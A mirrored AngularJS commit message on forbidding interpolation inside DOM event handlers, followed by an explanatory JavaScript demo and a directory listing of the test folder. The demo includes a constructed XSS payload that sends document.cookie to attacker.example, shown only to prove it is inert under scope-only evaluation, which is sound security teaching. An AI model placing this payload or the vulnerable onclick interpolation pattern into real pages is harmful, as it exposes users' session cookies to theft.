mirror of
https://github.com/Hopiu/angular.js.git
synced 2026-03-17 07:40:22 +00:00
BREAKING CHANGE: Interpolations inside DOM event handlers are
disallowed. DOM event handlers execute arbitrary JavaScript code.
Using an interpolation for such handlers means that the interpolated
value is a JS string that is evaluated. Storing or generating such
strings is error prone and likely leads to an XSS if you're not
super careful. On the other hand, ng-click and such event handlers
evaluate Angular expressions that are a lot safer (e.g. no direct
access to global objects - only scope), cleaner and harder to
exploit.

To migrate the code follow the example below:

Before:
JS: scope.foo = 'alert(1)';
HTML: <div onclick="{{foo}}">

After:
JS: scope.foo = function() { alert(1); }
HTML: <div ng-click="foo()">
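The contrast the commit message draws, as an added example that is not AngularJS code and not part of the original commit: a naive `{{ }}` interpolator copies whatever string is in scope straight into the `onclick` attribute, where the browser treats it as JavaScript source, so attribute-escaping cannot help; a minimal stand-in for an expression evaluator resolves names against the scope object only, so a string in scope stays data and `window.alert(1)` has nowhere to resolve. `interpolate`, `evalScopeExpression` and `migrationDemo` are hypothetical helpers written for this illustration, and the attacker-supplied value is constructed.

```javascript
// Naive {{name}} interpolation into attribute text. The scope value is
// inserted verbatim, so inside onclick="..." it becomes executable JS.
function interpolate(template, scope) {
  return template.replace(/\{\{\s*(\w+)\s*\}\}/g, (_, name) =>
    Object.prototype.hasOwnProperty.call(scope, name) ? String(scope[name]) : '');
}

// Tiny stand-in for an ng-click style expression evaluator (hypothetical,
// far smaller than Angular's parser). It accepts only `name` or `name()`,
// looks the name up on the scope object alone, and rejects anything else,
// so there is no path to window, document, or any other global.
function evalScopeExpression(expr, scope) {
  const m = /^\s*([A-Za-z_$][\w$]*)\s*(\(\s*\))?\s*$/.exec(expr);
  if (!m) throw new Error('unsupported expression: ' + expr);
  const [, name, isCall] = m;
  if (!Object.prototype.hasOwnProperty.call(scope, name)) return undefined;
  const value = scope[name];
  if (!isCall) return value;
  if (typeof value !== 'function') {
    // A string in scope is data, not code: calling it is an error, not an XSS.
    throw new Error(name + ' is not a function');
  }
  return value.call(scope);
}

// Walks the commit message's before/after migration plus an attacker-shaped
// value, returning the outcomes so they can be inspected or asserted on.
function migrationDemo() {
  // Before: the value in scope is a JS string and lands in the handler as-is.
  const before = interpolate('<div onclick="{{foo}}">', { foo: 'alert(1)' });

  // Constructed attacker-controlled value: same template, now it exfiltrates.
  const hostile = 'fetch("https://attacker.example/?c=" + document.cookie)';
  const injected = interpolate('<div onclick="{{foo}}">', { foo: hostile });

  // After: the handler is an expression over scope; foo is a real function.
  const calls = [];
  const after = evalScopeExpression('foo()', {
    foo() { calls.push('foo called'); return 'clicked'; },
  });

  // The same hostile string placed in scope is inert under expression
  // evaluation: `foo()` fails because foo is not a function.
  let hostileEvalFailed = false;
  try { evalScopeExpression('foo()', { foo: hostile }); } catch (e) { hostileEvalFailed = true; }

  // Globals are unreachable: `window.alert(1)` is not a scope-only expression.
  let globalRejected = false;
  try { evalScopeExpression('window.alert(1)', {}); } catch (e) { globalRejected = true; }

  return { before, injected, after, calls, hostileEvalFailed, globalRejected };
}

const demo = migrationDemo();
console.log(demo.before);   // <div onclick="alert(1)">
console.log(demo.injected); // the fetch(...) payload, verbatim, inside onclick
console.log(demo.after, demo.hostileEvalFailed, demo.globalRejected);
```

The point of the toy evaluator is not its feature set but its resolution rule: every identifier is looked up on the scope object and nowhere else, which is the property the commit message relies on when it says ng-click expressions cannot reach global objects.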
Directory listing:
- auto
- ng
- ngCookies
- ngMobile
- ngMock
- ngResource
- ngRoute
- ngSanitize
- ngScenario
- AngularSpec.js
- ApiSpecs.js
- BinderSpec.js
- jqLiteSpec.js
- jquery_alias.js
- jquery_remove.js
- jQueryPatchSpec.js
- loaderSpec.js
- matchers.js
- minErrSpec.js
- testabilityPatch.js